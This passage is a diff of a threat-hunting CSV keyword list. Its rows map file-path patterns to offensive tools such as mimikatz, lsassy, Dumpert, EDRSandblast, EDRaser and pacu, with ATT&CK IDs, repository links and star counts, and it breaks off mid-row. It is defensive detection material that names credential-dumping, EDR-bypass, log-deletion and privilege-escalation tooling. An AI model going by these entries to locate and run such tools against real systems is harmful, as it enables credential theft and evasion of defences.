-"*/dumpmethod/*.py","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*/DumpShellcode/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*/DumpCerts*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" 
+"*/dumpert.c*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*/Dumpert/*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*/dumpmethod/*.py","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*/DumpShellcode/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*/DumpsterFire/*","offensive_tool_keyword","DumpsterFire","The DumpsterFire Toolset is a modular. menu-driven. cross-platform tool for building repeatable. time-delayed. distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents. distractions. and lures to support and scale their operations. Turn paper tabletop exercises into controlled live fire range events. 
Build event sequences (narratives) to simulate realistic scenarios and generate corresponding network and filesystem artifacts.","T1175 - T1176 - T1589","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/TryCatchHCF/DumpsterFire","1","0","N/A","N/A","10","934","152","2020-05-27T15:00:56Z","2017-10-05T23:44:54Z" "*/dumpweb.log*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*/dumpXor.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*/dumpXor/dumpXor*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*/dunderhay/CVE-202*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","1","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z" "*/duplicates.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/e2e_commands.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z"
-"*/e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z"
+"*/e2e_commands.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
"*/eap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Ebowla.git*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*/ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" -"*/ec2__backdoor_ec2_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/ec2__check_termination_protection*.py","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/ec2__startup_shell_script/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - 
TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/ec2_public_ips_*_*.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2__backdoor_ec2_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2__check_termination_protection*.py","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2__startup_shell_script/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2_public_ips_*_*.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - 
TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*/EC2Looter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/echoac-poc.git*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" -"*/edb-35948/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/edb-35948/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*/EDRaser.git*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*/edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" 
-"*/edr-checker/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/edr-checker/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/EDRSandblast.git*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*/EDRSandblast/*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*/EDRSandblast/*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*/EfsPotato.git*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" -"*/egghunter.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/egghunter.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/Egress-Assess*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*/elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*/ElevateKit/elevate.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*/elf/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/elf/exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*/ElevateKit/elevate.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 